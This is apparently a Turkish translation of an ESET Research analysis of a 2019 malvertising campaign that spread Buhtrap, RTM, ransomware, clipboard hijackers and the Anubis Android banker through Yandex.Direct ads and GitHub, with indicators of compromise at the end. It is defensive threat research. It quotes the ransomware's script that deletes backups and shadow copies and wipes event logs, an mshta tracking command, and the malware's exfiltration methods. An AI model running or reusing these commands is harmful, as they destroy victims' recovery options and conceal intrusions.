Buhtrap arka kapı ve fidye yazılımı önde gelen reklam platformu üzerinden dağıtıldı

ESET Research10.05.2019

Muhasebecileri işleriyle ilgili internet üzerinde belgeler ararken hedeflemekten daha iyi bir yol olabilir mi? Bu tam olarak geçtiğimiz birkaç ayda meydana gelen, bir grubun iki bilinen arka kapıyı (Buhtrap ve RTM) ve bunun yanı sıra fidye yazılımlarıyla kripto para hırsızlığını kullanarak başta Rusya olmak üzere çeşitli yerlerde farklı organizasyonları hedeflediği şeydir. Hedefleme, potansiyel hedefi belge şablonları olarak gizlenmiş zararlı indirmeler içeren bir web sitesine yönlendirme amacıyla Yandex.Direct üzerinden zararlı reklamlar göndererek gerçekleştirilmektedir. Yandex, Rusya'da internet üzerindeki en büyük arama motoru olarak bilinmektedir. Yandex.Direct ise bunun çevrimiçi reklamcılık ağıdır. Yandex ile iletişime geçtik ve bu zararlı reklam kampanyasını kaldırdılar.

Buhtrap arka kapısının kaynak kodu geçmişte sızdırılmış ve herkes tarafından kullanılabilir olsa da, bildiğimiz kadarıla en azından RTM kodu bu durumda değil. Bu blogda, tehdit aktörlerinin Yandex.Direct daresini suistimal edip GitHub'da barındırarak zararlı yazılımlarını nasıl dağıttıklarını açıklayacağız. Kullanılan zararlı yazılımın teknik analiziyle açıklamayı sonuçlandıracağız.

Dağıtım mekanizması ve kurbanlar

Farklı yükleri birbirine bağlayan şey onların nasıl dağıtıldığıdır: siber suçlular tarafından oluşturulan tüm zararlı dosyalar iki farklı GitHub deposunda barındırılıyordu.

Bu kaynaktan genelde tek bir zararlı dosya indirilebilmekteydi, fakatı bu sıklıkla değişiyordu. Değişim geçmişi GitHub deposunda mevcut olmakla birlikte, bize hangi zararlı yazılımın ne zaman dağıtıldığını görme imkanı sağlıyordu. Kullanıcıların bu zararlı dosyaları bir web sitesi üzerinden indirmelerinin bir yolu da aşağıda da görülebilecek blanki-shabloni24[.]ru adlı web sitesidir.

Şekil1: blanki-shabloni24[.]ru açılış sayfası

Zararlı dosya isimlerinin yanı sıra web sitesinin dizaynı da oldukça açık şekilde hazırlanmıştır: hepsi formlar, şablonlar ve kontratlarla ilgilidir. Sahte yazılım adı şu şekilde çevrilir: "2018 Taslak Koleksiyonu: formlar, şablonlar, kontratlar, örnekler". Buhtrap ve RTM'nin geçmişte muhasebe birimlerini hedeflemek amacıyla kullanıldığı göz önüne alındığında, hemen benzer bir stratejinin uygulanmaya çalışıldığını fark ettik. Ama potansiyel kurbanlar web sitesine nasıl yönlendirildi?

Bulaştırma kampanyaları

Bu siteye giren potansiyel kurbanların en azından bir kısmı, malvertising yoluyla tuzağa düşürülmüştür. Aşağıda zararlı bir siteye yönlendirme yapan URL örneğini görebilirsiniz:

blanki-shabloni24.ru{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

URL içerisindeki bb.f2[.]kz adresinde, meşru bir muhasebe forumu olan banner reklam görünüyor. Bu bannerların tümünün muhasebecilik ya da hukuki danışmanlıkla ilgili olup aynı kampanya kimliği (blanki_rsya) altında pek çok farklı web sitesinde görüntülendiklerini belirtmek önemlidir. Ayrıca URL üzerinden kullanıcının ne aradığını ("скачать бланк счета” veya "download invoice template") görebiliyoruz ve bu da kuruluşların hedeflendiği tezimizi güçlendiriyor. Bannerların ve ilgili arama kriterlerinin görüntülendiği web sitelerinin listesi aşağıda görülebilirTablo1.

Search term RU

Search term EN (Google Translate)

Domain

скачать бланк счета

download invoice template

bb.f2[.]kz

образец договора

contract example

Ipopen[.]ru

заявление жалоба образец

claim complaint example

77metrov[.]ru

бланк договора

contract form

blank-dogovor-kupli-prodazhi[.]ru

судебное ходатайство образец

judicial petition example

zen.yandex[.]ru

образец жалобы

example complaint

yurday[.]ru

образцы бланков договоров

example contract forms

Regforum[.]ru

бланк договора

contract form

assistentus[.]ru

образец договора квартиры

example apartment contract

napravah[.]com

образцы юридических договоров

examples of legal contracts

avito[.]ru

Tablo1Kullanılan arama kriterleri ve bannerların yer aldığı alan adresleri.

Blanki-shabloni24[.]ru web sitesi muhtemelen basit bir incelemeyle anlaşılmamak üzere bu şekilde tasarlandı. GitHub linkine sahip profesyonel görünümlü bir reklam, görünürde kötü bir şey değildir. Dahası, siber suçlular zararlı dosyalarını GitHub depolarına yalnızca sınırlı bir süre için; muhtemelen reklam kampanyasının aktif olduğu süre boyunca koymaktaydılar. GitHub'daki yük çoğu zaman boş bir zip dosyası veya temiz bir yürütülebilir dosyaydı. Özetlemek gerekirse, siber suçlular belirli terimler arayan muhasebeciler tarafından ziyaret edilmesi muhtemel web sitelerine Yandex.Direct hizmeti aracılığıyla bu reklamları dağıtabildiler.

Şimdi bu şekilde dağıtılan farklı yüklere bir göz atalım.

Yük Analizi

Dağıtım zaman çizelgesi

Bu zararlı yazılım kampanyası Ekim 2018'de başladı ve bu makale kaleme alındığı tarihte hala aktifti. Tüm depo GitHub'da herkese açık olduğundan, dağıtılan kötü amaçlı yazılım ailelerinin kesin bir zaman çizelgesini çizebildik (bkzŞekil 2). Bu dönemde GitHub'da barındırılan altı farklı kötü amaçlı yazılım ailesi gözlemledik. GitHub geçmişiyle karşılaştırmak için, ESET uzaktan ölçüm bilgilerine dayalı banner bağlantılarının ne zaman görüldüğünü gösteren bir satır ekledik. Yüklerin GitHub'da mevcut olduğu anlarla oldukça iyi ilişkili olduğunu görebiliyoruz. Şubat ayının sonundaki tutarsızlık, geçmişteki bir bölümden yoksun olma ihtimali ile açıklanabilir. Çünkü depo, biz hepsini alamadan GitHub'dan kaldırıldı.

Şekil 2: Zararlı yazılım dağıtımı zaman çizelgesi

Kod İmzalama Sertifikaları

Bu kampanya sırasında dağıtılan kötü amaçlı yazılımları imzalamak için birden çok kod imzalama sertifikası kullanılmıştır. Sertifikaların bazıları birden fazla kötü amaçlı yazılım ailesini imzalamak için kullanıldı; bu da çeşitli kötü amaçlı yazılım örneklerini aynı kampanyaya bağlayan ek bir gösterge olarak öne çıkmaktadır. Operatörler GitHub deposuna yönlendirdikleri ikili dosyaları sistematik olarak imzalamadılar. Bu sertifikaların özel anahtarına erişebildikleri göz önüne alındığında, hepsi için bunu kullanmamaları şaşırtıcı. Ayrıca operatörler Şubat 2019 sonunda, özel anahtara sahip olmayan Google'a ait bir sertifikayla geçersiz imzalar üretmeye başladılar.

Bu kampanyada yer alan tüm sertifikalar ve imzaladıkları kötü amaçlı yazılım aileleri şurada görüntülenirTablo2.

Sertifika CN

Parmak izi

İmzalanan kötü amaçlı yazılım ailesi

TOV TEMA LLC

775E9905489B5BB4296D1AD85F3E45BC936E7FDC

Win32/ClipBanker

TOV "MARIYA"

EE6FAF6FD2888A6D11DD710B586B78E794FC74FC

Win32/ClipBanker

"VERY EXCLUSIVE LTD"

BD129D61914D3A6B5F4B634976E864C91B6DBC8E

Win32/Spy.Buhtrap

"VERY EXCLUSIVE LTD."

764F182C1F46B380249CAFB8BA3E7487FAF21E2A

Win32/Filecoder.Buhtrap

MSIL/ClipBanker

TRAHELEN LIMITED

7C1D7CE90000B0E603362F294BC4A85679E38439

Win32/Spy.RTM

LEDI, TOV

15FEA3B0B839A58AABC6A604F4831B07097C8018

Win32/Filecoder.Buhtrap

Google Inc

1A6AC0549A4A44264DEB6FF003391DA2F285B19F

Win32/Filecoder.Buhtrap

MSIL/ClipBanker

Tablo2 Bu şekilde imzalanmış sertifikaların ve kötü amaçlı yazılımların listesi.

Ayrıca diğer kötü amaçlı yazılım aileleriyle bağlantı kurup kuramayacağımızı görmek için bu kod imzalama sertifikalarını da kullandık. Sertifikaların çoğunda GitHub deposu aracılığıyla dağıtılmayan kötü amaçlı yazılım bulamadık. Bununla birlikte, TOV “MARIYA” sertifikası konusunda, bunun Wauchos botnet'e ait kötü amaçlı yazılımları ve bazı reklam yazılımlarıyla ve kripto para madencilerini imzalamak için kullanıldığı görülmüştür. Bu kötü amaçlı yazılım türevlerinin analiz ettiğimiz kampanyayla bağlantılı olması pek olası değildir. İlgili sertifikanın bazı çevrimiçi karaborsa platformlarından satın alınmış olması muhtemeldir.

Win32/Filecoder.Buhtrap

Dikkatimizi çeken ilk bileşen daha önce görülmemiş Win32/Filecoder .Buhtrap'ti. Bu, bazen paketlenmiş olarak gelen bir Delphi ikili sistemiydi. Çoğunlukla 2019'un Şubat ve Mart aylarında dağıtıldı. Fidye yazılımlarının beklenen davranışını uygulayarak yerel sürücüleri ve ağ paylaşımlarını keşfetmekte ve bu aygıtlarda bulunan dosyaları şifrelemekteydi. Kurbanlarının dosyalarını şifrelemek için internet bağlantısına ihtiyaç duymaz, çünkü şifreleme anahtarlarını göndermek için bir sunucu ile iletişim kurmaz. Bunun yerine, fidye mesajının sonuna bir "token" ekler ve kurbanlarının operatörlerle e-posta veya Bitmessage yoluyla iletişim kurmasını talep eder. Fidye notu Ek A'da görülebilir.

Filecoder.Buhtrap, mümkün olduğunca çok sayıda önemli kaynağı şifrelemek için değerli verileri içeren dosyalarda açık noktalara sahip olabilecek anahtar yazılımları devre dışı bırakmaya adanmış bir işlem başlatır ve böylece şifrelenmelerini önler. Hedeflenen işlemler esas olarak veritabanı yönetim sistemleridir (DBMS). Ayrıca, Filecoder.Buhtrap kendi dosyalarını kurtarmak adına, herhangi bir çevrimdışı yedekleme olmadan kurbanlar için bunu mümkün olduğunca zor hale getirmek amacıyla günlük dosyaları ve yedekleri kaldırır. Bunu yapmak için, toplu script Şekil3 dosyası yürütülür.

bcdedit /set {default} bootstatuspolicy ignoreallfailures

bcdedit /set {default} recoveryenabled no

wbadmin delete catalog -quiet

wbadmin delete systemstatebackup

wbadmin delete systemstatebackup -keepversions:0

wbadmin delete backup

wmic shadowcopy delete

vssadmin delete shadows /all /quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

attrib "%userprofile%\documents\Default.rdp" -s -h

del "%userprofile%\documents\Default.rdp"

wevtutil.exe clear-log Application

wevtutil.exe clear-log Security

wevtutil.exe clear-log System

sc config eventlog start=disabled

Şekil3 Script yedekleri ve log dosyalarını kaldırıyor.

Filecoder.Buhtrap, kimin hangi web sitesini ziyaret ettiği hakkında bilgi toplamak üzere tasarlanmış meşru çevrimiçi IP Logger servisini kullanır. Bu, fidye yazılımının kurbanlarını takip etmek için kullanılır. Bundan komut satırıŞekil4 sorumludur.

mshta.exe "javascript:document.write('<img src=\'iplogger.org/173Es7.txt\'><script>setInterval(function(){close();},10000);</script>');"

Şekil4 iplogger.org sorgusu.

Şifrelenmiş dosyalar, üç harici listeyle eşleşmemelerine göre seçilir. İlk olarak, aşağıdaki uzantıları içeren dosyaları şifrelemez: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat . İkinci olarak, bulunduu konumda aşağıda listelenen Şekil 5dizinlerden birini içeren tüm dosyalar hariç tutulur.

\.{ED7BA470-8E54-465E-825C-99712043E01C}\

\tor browser\

\opera\

\opera software\

\mozilla\

\mozilla firefox\

\internet explorer\

\google\chrome\

\google\

\boot\

\application data\

\apple computer\safari\

\appdata\

\all users\

:\windows\

:\system volume information\

:\nvidia\

:\intel\

Şekil 5 Şifrelemenin dışında bırakılan dizinler.

Ve üçüncü adımda, belirli dosya adları şifrelemenin dışında tutulur, bunlar arasında fidye notunun dosya adın da bulunmaktadır. Şekil 6bu listeyi gösterir. Bu istisnalar bir araya gelerek açıkça şifrelenmiş bir kurban makineyi minimum düzeyde kullanılabilir bırakmayı amaçlamaktadır.

boot.ini

bootfont.bin

bootsect.bak

desktop.ini

iconcache.db

ntdetect.com

ntldr

ntuser.dat

ntuser.dat.log

ntuser.ini

thumbs.db

winupas.exe

your files are now encrypted.txt

windows update assistant.lnk

master.exe

unlock.exe

unlocker.exe

Şekil 6 Şifrelemenin dışında bırakılan dizinler.

Dosya şifreleme şeması

Kötü amaçlı yazılım başlatıldığında, 512 bit uzunluğunda bir RSA anahtar çifti oluşturur. Daha sonra özel üs (d) ve modül (n) dahili olarak kodlanmış bir 2048 bit genel anahtar (genel üs ve modül)ile, zlib yoluyla sıkıştırılıp base64 ile kodlanarak şifrelenir. Bundan sorumlu kod aşağıda görülebilir Şekil 7.

Şekil 7: 512-bit RSA anahtar çiftinin oluşturulma rutininin Hex-Ray decompiler çıkışı

Şekil 8 fidye notuna eklenen belirteci oluşturan özel anahtarın düz metin versiyonunun bir örneğini gösterir.

<N>DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F39</N><D>9197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239</D>

Şekil 8 Oluşturulan özel anahtarın bir örneği.

Saldırganın ortak anahtarı buradan Şekil 9 görülebilir.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005

n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

Şekil 9 Dahili olarak kodlanmış ortak RSA anahtarı

Dosyalar 256-bit anahtara sahip AES-128-CBC kullanılarak şifrelenmiştir. Her dosyanın şifrelenmesi için yeni bir anahtar ve yeni bir başlatma vektörü oluşturulur. Anahtar bilgileri şifrelenmiş dosyanın sonuna eklenir. Şifrelenmiş bir dosyanın biçimini inceleyelim.

Şifrelenmiş dosyalar aşağıdaki başlığa sahiptir:

Magic Header

Encrypted Size

Decrypted size

Encrypted data

0x56 0x1A

uint64_t

encrypt('VEGA' + filedata[:0x5000])

Sihirli değeri “VEGA” ile öncülük edilen orijinal dosyadaki veriler ilk 0x5000 bayta kadar şifrelenir. Dosyanın şifresini çözmek için gerekli tüm bilgiler bu yapıya sahip dosyaya eklenir:

File size marker

Size of AES key blob

AES key blob

Size of RSA key blob

RSA key blob

Offset to File size marker

0x01 or 0x02

uint32_t

Dosya boyutu işaretçisi, dosya boyutunun > 0x5000 bayt olup olmadığını gösteren bir bayrak içerir
AES key blob = ZlibCompress(RSAEncrypt(AES Key + IV, ortak RSA anahtar bileşenini oluşturur))
RSA key blob = ZlibCompress(RSAEncrypt(RSA özel anahtarını, dahili olarak kodlanmış RSA ortak anahtarını üretir))

Win32/ClipBanker

Win32/ClipBanker, Ekim ayının sonundan Aralık 2018'e kadar belirli aralıklarla dağıtılan bir bileşendir. Rolü, kripto para birimi adreslerini arayan panonun içeriğini izlemektir. Hedeflenen bir kripto para adresi bulunursa, muhtemelen kötü amaçlı yazılım operatörüne ait bir adresle değiştirilir. Baktığımız örnekler ne paketlenmiş, ne de gizlenmişti. Davranışlarını gizlemek için kullanılan tek mekanizma dizin şifrelemesiydi. Kripto para birimi adresleri RC4 kullanılarak şifrelenmiştir. Bitcoin, Bitcoin nakit, cash, Ethereum ve Ripple gibi çeşitli kripto para birimleri hedeflenmektedir.

Dağıtım sırasında saldırganın Bitcoin adreslerine çok önemsiz bir miktarda BTC gönderilir, ki bu da kampanyanın çok başarılı olmadığınının bir göstergesidir. Ayrıca, belirtilen işlemlerin bu kötü amaçlı yazılım ile ilgili olduğundan emin olmanın bir yolu yoktur.

Win32/RTM

Win32/RTM, Mart 2019 başlarında, birkaç gün içerisinde dağıtılan bir bileşendir. RTM uzaktan yönetilen bankacılık sistemlerini hedef alan Delphi'de yazılmış bir bankacılık truva atıdır. 2017'de ESET araştırmacıları, bu kötü amaçlı yazılımın kapsamlı analizini içeren bir teknik makale yayınladılar. O zamandan beri çok az şey değiştiği için, ilgili okuyucunun daha fazla ayrıntı için bu yayına başvurmasını öneriyoruz. Ocak 2019'da, Palo Alto Networks bu kötü amaçlı yazılım hakkında bir blog paylaşımı yayınladı.

Buhtrap downloader

Kısa bir süre için GitHub'dan sunulan paket, geçmiş Buhtrap takımıyla hiçbir benzerlik taşımayan bir indirme dosyasıydı. Bu indirme dosyası, bir sonraki aşamaya geçmek ve doğrudan belleğe yüklemek için 94.100.18[.]67/RSS.php; adresine ulaşır. Bu ikinci aşama kodu için iki farklı davranış tespit ettik. Birinde RSS.php URL adresi Buhtrap arka kapısına doğrudan hizmet verdi. Bu arka kapı, sızan kaynak kodunda kullanılanla oldukça benzerdir.

Burada ilgi çekici olan, muhtemelen farklı aktörlerden gelen Buhtrap arka kapısını kullanan birkaç farklı kampanya görmemiz. Bu durumdaki temel farklılıklar, ilk olarak arka kapının önceki blog paylaşımımızda da belgelendiği gibi olağan DLL yan-yükleme numarası kullanılarak değil, bellekte doğrudan yüklendiği ve ikinci olarak, onlar C&C sunucusuna yönelik ağ trafiğini şifrelemek için kullanılan RC4 anahtarının değiştirilmiş olmasıdır. Dolaşımda gördüğümüz kampanyaların çoğu, bu anahtarı değiştirmeye bile zahmet etmiyor.

Rastladığımız diğer daha karmaşık durumlarda, RSS.php URL başka bir indirme dosyasına hizmet ediyor. Bu indirme dosyası dinamik içe aktarım tablosunun yeniden yapılandırılması gibi bazı gizli işlemler uygular. Bu indirme dosyasının nihai amacı msiofficeupd[.]com/api/F27F84EDA4D13B15/2  adresindeki C&C sunucusuyla iletişime geçerek log göndermek ve geri dönüş beklemektir. Sondakine ikili bir blob gibi davranır, hafızaya yükler ve çalıştırır. Bu indirme dosyası tarafından yürütüldüğünü gördüğümüz yük, yukarıda açıklanan Buhtrap arka kapısı ile aynı olmakla birlikte, diğer yükler de mevcut olabilir.

Android/Spy.Banker

İlginç bir şekilde, GitHub deposunda bir Android bileşeni de bulundu. 1 Kasım 2018'de sadece bir gün merkez adresindeydi. O gün GitHub'da barındırıldığı gerçeğinin dışında, ESET uzaktan ölçüm verileri bu kötü amaçlı yazılımın etkin şekilde dağıtıldığına dair bir kanıt göstermemektedir.

Android bileşeni, GitHub'da Android Uygulama Paketi (APK) olarak barındırılmıştır. Oldukça ağır bir şekilde karartılmıştır. Kötü amaçlı davranış, APK'da bulunan şifreli bir JAR'da gizlenir. Bu anahtar kullanılarak RC4 ile şifrelenir:

key = [

0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,

0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,

0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96

]

Aynı anahtar ve algoritma, dizeleri şifrelemek için de kullanılmıştır. JAR, APK_ROOT + image/files konumunda bulunmaktadır. Dosyanın ilk 4 baytı, uzunluk alanından hemen sonra başlayan şifreli JAR'ın uzunluğunu içermektedir.

Dosyanın şifresini çözdükten sonra, zaten belgelenmiş bir Android Banker olan Anubis olduğu anlaşıldı. Bu kötü amaçlı yazılım aşağıdaki yeteneklere sahiptir:

Mikrofon kaydı
Ekran görüntüsü alma

GPS konumu tespit etme
Tuş vuruşlarını kayıt altına alma
Cihaz verilerini şifreleme ve fidye isteme
Spam gönderme

C&C sunucuları:

sositehuypidarasi[.]com
ktosdelaetskrintotpidor[.]com

İlginç olarak, Twitter'ı başka bir C&C sunucusuna yönlenmek üzere geri dönülecek bir iletişim kanalı olarak kullanmıştır. Analiz ettiğimiz örnekte kullanılan Twitter hesabı @JohnesTrader olmakla birlikte, analizin yapıldığı sürede çoktan askıya alınmıştır.

Kötü amaçlı yazılım, Android cihazında hedeflenen uygulamaların bir listesini içerir. Bu liste, Sophos araştırmacıları tarafından incelendiği zamana göre daha uzundur. Dünyanın dört bir yanından bankalar için birçok bankacılık uygulaması, Amazon ve eBay gibi bazı e-alışveriş uygulamaları ve kripto para uygulamaları hedeflemektedir. Ek B içerisine tam listeyi dahil ettik.

MSIL/ClipBanker.IH

Bu blog paylaşımı kapsamında yer alan kampanya sırasında dağıtılacak en son bileşen, Mart 2019'da dağıtılan bir .NET Windows yürütülebilir dosyasıdır. Baktığımız sürümlerin çoğu ConfuserEx v1.0.0 ile paketlenmiştir. Yukarıda açıklanan ClipBanker varyantında olduğu gibi, bu bileşen panoyu da ele geçirir. Steam tekliflerinin yanı sıra, pek çok çeşitli kripto para birimlerini de hedefler. Ayrıca, Bitcoin'in WIF özel anahtarını dışa aktarmak için IP Logger hizmetini kullanır.

Savunma mekanizmaları

ConfuserEx'in anti-debugging, anti-damping ve anti-tampering mekanizmalarından yararlanmanın yanı sıra, bu kötü amaçlı yazılım güvenlik ürünleri ve sanal makineler için de algılama rutinleri uygular.

Sanal makinede çalışıp çalışmadığını kontrol etmek için, BIOS hakkında bilgi sorgulamak üzere Windows'un yerleşik WMI komut satırını (WMIC) kullanır — detay vermek gerekirse:

wmic bios

Daha sonra şu belirli anahtar sözcükleri arayan komutun çıktısını ayrıştırır: VBOX, VirtualBox, XEN, qemu, bochs, VM.

Kötü amaçlı yazılım, güvenlik ürünlerini algılamak içinşekilde görülebilecek ManagementObjectSearcher API'sini Şekil 10kullanarak Windows Güvenlik Merkezi'ne bir Windows Yönetim Araçları (WMI) sorgusu gönderir. Base64 deşifre edildikten sonra çağrı:

ManagementObjectSearcher('root\\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Ayrıca, kötü amaçlı yazılım, kullanıcıları panoya kaçırmaktan korumak için tasarlanmış bir savunma aracı olan CryptoClipWatcher'ın çalışıp çalışmadığını kontrol eder ve eğer bunu tespit ederse, bu işlemin tüm süreçlerini askıya alır ve böylece korumayı devre dışı bırakır.

Persistence

Analiz ettiğimiz sürümde, zararlı yazılım kendini %APPDATA%\google\updater.exe içerisine kopyalayarak google dizinindegizli bir işaret oöluşturur. Daha sonra Windows Kayıt Defteri'nin SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell değerini değiştirir ve updater.exe yolunu ekler. Böylece bir kullanıcı her oturum açtığında kötü amaçlı yazılım yürütülür.

Zararlı davranış

Daha önce analiz ettiğimiz ClipBanker örneğinde olduğu gibi, bu .NET zararlı yazılım da pano içeriğini görüntüleyerek kripto para adresleri arar ve bunlardan birini bulursa, operatörün kendi adresiyle değiştirilir. Şekil11, kod içinde bulunan bir enum temel alınarak hedeflenen adreslerin bir listesini görüntüler.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Şekil11Desteklenen adres türleri için Enum sembolü

Bu adres türlerinin her biriyle ilişkili bir düzenli ifade vardır. Panoda tespit etmek için kullanılan düzenli ifadede gördüğümüz gibi, Steam'in teklif sistemini ele geçirmek için STEAM_URL değeri kullanılmaktadır:

\b(https:\/\/|http:\/\/|)steamcommunity\.com\/tradeoffer\/new\/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Geri çekilme kanalı

Panodaki adresleri değiştirmenin yanı sıra, bu .NET zararlı yazılımı ayrıca özel Bitcoin WIF anahtarlarını, Bitcoin Core cüzdanlarını ve Electrum Bitcoin cüzdanlarını da hedeflemektedir. Zararlı yazılım tahliye amacıyla iplogger.org adresini kullanarak özel WIF anahtarını elde eder. Operatörler bunu yapmak için, özel anahtar verilerini User-Agent HTTP başlığına gösterildiği gibi ekler (Şekil 12).

Şekil 12: Tahliye edilmiş veriyle IP Logger konsolu

Cüzdanların boşaltılmasına gelindiğinde, operatörler iplogger.org kullanmadılar. IP Logger'ın web arayüzünde görüntülenen User-Agent alanında 255 karakter sınırı olması, neden başka bir yöntem seçtiklerini açıklayabilir. Analiz ettiğimiz örneklerde, diğer sunucusunun ortam değişkeni DiscordWebHook'ta saklandığını gördük. Bizi şaşırtan şey, bu ortam değişkeninin hiçbir zaman kodun herhangi bir yerinde bulunmamasıdır. Bu, kötü amaçlı yazılımın hala geliştirilmekte olduğunu ve bu değişkenin operatörlerin test makinelerinde ayarlandığını düşündürmektedir.

Kötü amaçlı yazılımın hala geliştirilmekte olduğuna dair başka bir gösterge daha var. İkili dosya iki iplogger.org URL adresi içerir ve her ikisi de dışa aktarma üzerine sorgu yapmaktadır. Bu URL'lerden birine yapılan istekte, Referer alanındaki değer “DEV /” tarafından hazırlanmıştır. Ayrıca ConfuserEx ile dolu olmayan kötü amaçlı yazılımların bir sürümünü bulduk; bu URL alıcısına DevFeedbackUrl adı verilmektedir. Çevre değişkeninin adına dayanarak, operatörlerin yasal hizmet Discord'u planladıklarına ve kripto para cüzdanlarını dışa aktarmak için web kancası sistemini kötüye kullandıklarına inanıyoruz.

Sonuç

Bu kampanya, meşru reklamcılık servislerinin zararlı yazılım dağıtmak için nasıl suistimal edilebiceğine dair iyi bir örnektir. Bu kampanya özellikle Rus kuruluşlarını hedef almakla birlikte, böyle bir planın Rusya dışındaki reklam hizmetlerini kötüye kullanmasına da şaşırmayız. Böyle bir dolandırıcılığın kurbanı olmamak için kullanıcılar yazılımı indirdikleri yerin kaynağı iyi bilinen, saygın bir yazılım dağıtıcısı olduğundan her zaman emin olmalıdırlar.

IoCs

List of samples

SHA-1

Filename

ESET Detection Name

79B6EC126818A396BFF8AD438DB46EBF8D1715A1

hashfish.exe

Win32/ClipBanker.HM

11434828915749E591254BA9F52669ADE580E5A6

hashfish.apk

Android/Spy.Banker.KW

BC3EE8C27E72CCE9DB4E2F3901B96E32C8FC5088

hashfish.exe

Win32/ClipBanker.HM

CAF8ED9101D822B593F5AF8EDCC452DD9183EB1D

btctradebot.exe

Win32/ClipBanker.HM

B2A1A7B3D4A9AED983B39B28305DD19C8B0B2C20

blanki.exe

Win32/ClipBanker.HM

1783F715F41A32DAC0BAFBBDF70363EC24AC2E37

blanki.exe

Win32/Spy.Buhtrap.AE

291773D831E7DEE5D2E64B2D985DBD24371D2774

blanki.exe

Win32/Spy.Buhtrap.AE

4ADD8DCF883B1DFC50F9257302D19442F6639AE3

masterblankov24.exe

Win32/Spy.Buhtrap.AG

790ADB5AA4221D60590655050D0FBEB6AC634A20

masterblankov24.exe

Win32/Filecoder.Buhtrap.A

E72FAC43FF80BC0B7D39EEB545E6732DCBADBE22

vseblanki24.exe

Win32/Filecoder.Buhtrap.B

B45A6F02891AA4D7F80520C0A2777E1A5F527C4D

vseblanki24.exe

Win32/Filecoder.Buhtrap.C

0C1665183FF1E4496F84E616EF377A5B88C0AB56

vseblanki24.exe

Win32/Filecoder.Buhtrap.C

81A89F5597693CA85D21CD440E5EEAF6DE3A22E6

vseblanki24.exe

Win32/Spy.RTM.W

FAF3F379EB7EB969880AB044003537C3FB92464C

vseblanki24.exe

Win32/Spy.RTM.W

81C7A225F4CF9FE117B02B13A0A1112C8FB3F87E

master-blankov24.exe

Win32/Filecoder.Buhtrap.B

ED2BED87186B9E117576D861B5386447B83691F2

blanki.exe

Win32/Filecoder.Buhtrap.B

6C2676301A6630DA2A3A56ACC12D66E0D65BCF85

blanki.exe

Win32/Filecoder.Buhtrap.B

4B8A445C9F4A8EA24F42B9F80EA9A5E7E82725EF

mir_vseh_blankov_24.exe

Win32/Filecoder.Buhtrap.B

A390D13AFBEFD352D2351172301F672FCA2A73E1

master_blankov_300.exe

Win32/Filecoder.Buhtrap.B

1282711DED9DB140EBCED7B2872121EE18595C9B

sbornik_dokumentov.exe

Win32/Filecoder.Buhtrap.B

372B4458D274A6085D3D52BA9BE4E0F3E84F9623

sbornik_dokumentov.exe

MSIL/ClipBanker.IH

9DE1F602195F6109464B1A7DEAA2913D2C803362

nike.exe

MSIL/ClipBanker.IH

List of servers

Domain

IP Address

Malware family

sositehuypidarasi[.]com

212.227.20[.]93, 87.106.18[.]146

Android/Spy.Banker

ktosdelaetskrintotpidor[.]com

87.106.18[.]146

Android/Spy.Banker

94.100.18[.]67

Win32/RTM

stat-counter-7-1[.]bit

176.223.165[.]112

Win32/RTM

stat-counter-7-2[.]bit

95.211.214[.]14

Win32/RTM

blanki-shabloni24[.]ru

37.1.221[.]248, 5.45.71[.]239

Superjob[.]icu
